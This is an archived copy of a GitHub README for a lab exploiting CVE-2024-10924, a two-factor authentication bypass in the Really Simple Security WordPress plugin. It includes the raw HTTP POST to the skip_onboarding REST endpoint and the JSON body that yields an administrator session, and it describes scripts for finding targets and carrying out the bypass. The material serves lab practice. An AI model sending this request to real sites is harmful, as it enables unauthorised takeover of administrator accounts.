Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-10924 PoC — Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1 - Authentication Bypass

Source
https://github.com/D1se0/CVE-2024-10924-Bypass-MFA-Wordpress-LAB
Associated Vulnerability
Title:Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1 - Authentication Bypass (CVE-2024-10924)
Description:The Really Simple Security (Free, Pro, and Pro Multisite) plugins for WordPress are vulnerable to authentication bypass in versions 9.0.0 to 9.1.1.1. This is due to improper user check error handling in the two-factor REST API actions with the 'check_login_and_get_user' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, when the "Two-Factor Authentication" setting is enabled (disabled by default).
Readme
# CVE-2024-10924 Bypass MFA WordPress - Exploit Lab

This repository provides a lab for exploiting the `CVE-2024-10924` vulnerability in `WordPress`, specifically to bypass `two-factor authentication (MFA)` and gain access to the `WordPress` administration panel.

## Prerequisites

To deploy this lab in your environment, follow the steps below:

## **Deploy WordPress on VMware**

You will have to unzip the `zip` of the LAB, going to VMWare you will have to click on `Open` to import a machine, we select the file called `Ubuntu-Bypass-MFA-Wordpress.vmx`, and finally we will have to click on `Power` to turn on the vulnerable machine.

[Download LAB](https://drive.google.com/file/d/1a8h6HHDFfkyZRGUdvXdQtcYxLiXH8n_I/view?usp=sharing)

## **Configure Kali Linux**

On your Kali machine, install the necessary tools and make sure you have the following applications installed:

- `nmap`: To perform network scans.
- `requests`: To make HTTP requests (if you don't have it, install `requests` with `pip install requests`).
- `rich`: For elegant output to the console (install with `pip install rich`).

## **Get WordPress machine IP**

To get the IP of the WordPress machine in the network environment, run the following script from your Kali machine:

```bash
$ python3 knowIPwordpress.py
```
```
This script does the following:
```

Detect your local `IP`.
Scans the corresponding network segment to find active `IPs`.
Perform a port scan for `HTTP` services.
Check that the WordPress machine's `IP` has the title `"Bypass-MFA"` in its `HTTP` service.
Once found, it will show you the `URL` where you can access the `WordPress` administration panel:

```bash
Accede a WordPress en: http://<IP>/wp-admin
```

## Double Check Bypass (MFA):

### Credentials Wordpress:

```
admin:admin
```

When you try to log in to `WordPress`, it will ask you for `two-factor verification (MFA)`. To bypass this step, run the following script on your `Kali`:

```bash
$ python3 bypass-MFA-Wordpress.py
```

How the `bypass-MFA-Wordpress.py` script works
This script exploits the `CVE-2024-10924` vulnerability and bypasses double verification to gain access to the `WordPress` administration panel.

## Script flow:
Get session cookie: The script makes an `HTTP` request to the `reallysimplessl/v1/two_fa/skip_onboarding` endpoint to obtain a valid session cookie.

The request is sent with the following information:

```json
{
    "user_id": 1,
    "login_nonce": "133333337",
    "redirect_to": "/wp-admin/"
}
```

## Login Request: 
Once the cookie is obtained, the script requests the `WordPress` username and password. Then, make a `POST` request to the `wp-admin/profile.php` endpoint with the provided credentials to log in.

## Generation of an HTML file: 
If the bypass is successful, the script saves the response from the administrator dashboard to a `.html` file and opens it in your default browser.

You will now have access to the `WordPress` administration panel!

## Manual way Bypass-MFA-Wordpress:

If you want to do it manually with `BurpSuite` and we want to know the `Endpoint` to which we have to send the request in order to capture the `Cookies`, we can do it in the following way

```bash
$ python3 endpointWordpress.py
```

This will tell us the code that we will have to put in `BurpSuite` to be able to capture the `Cookies`, in my case it would be something like this:

```json
POST http://192.168.5.192/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: 192.168.5.192
Content-Type: application/json
Content-Length: 89
Connection: keep-alive

{
    "user_id": 1,
    "login_nonce": "133333337",
    "redirect_to": "/wp-admin/"
}
```

## More information in my YT video:

LINK = [Video CVE-2024-10924-Bypass-MFA-Wordpress-LAB](LINK)
File Snapshot

 [4.0K]  /data/pocs/5836471f6358636acaba6c937268cd483e5555a5
├── [4.3K]  bypass-MFA-Wordpress.py
├── [1.5K]  endpointWordpress.py
├── [4.6K]  knowIPwordpress.py
├── [4.0K]  plugin_vuln
│   └── [1.3M]  really-simple-ssl.zip
├── [3.7K]  README.md
└── [4.0K]  wordpressIMG-VMWare
    └── [ 144]  DownloadLABWordpress.md

2 directories, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →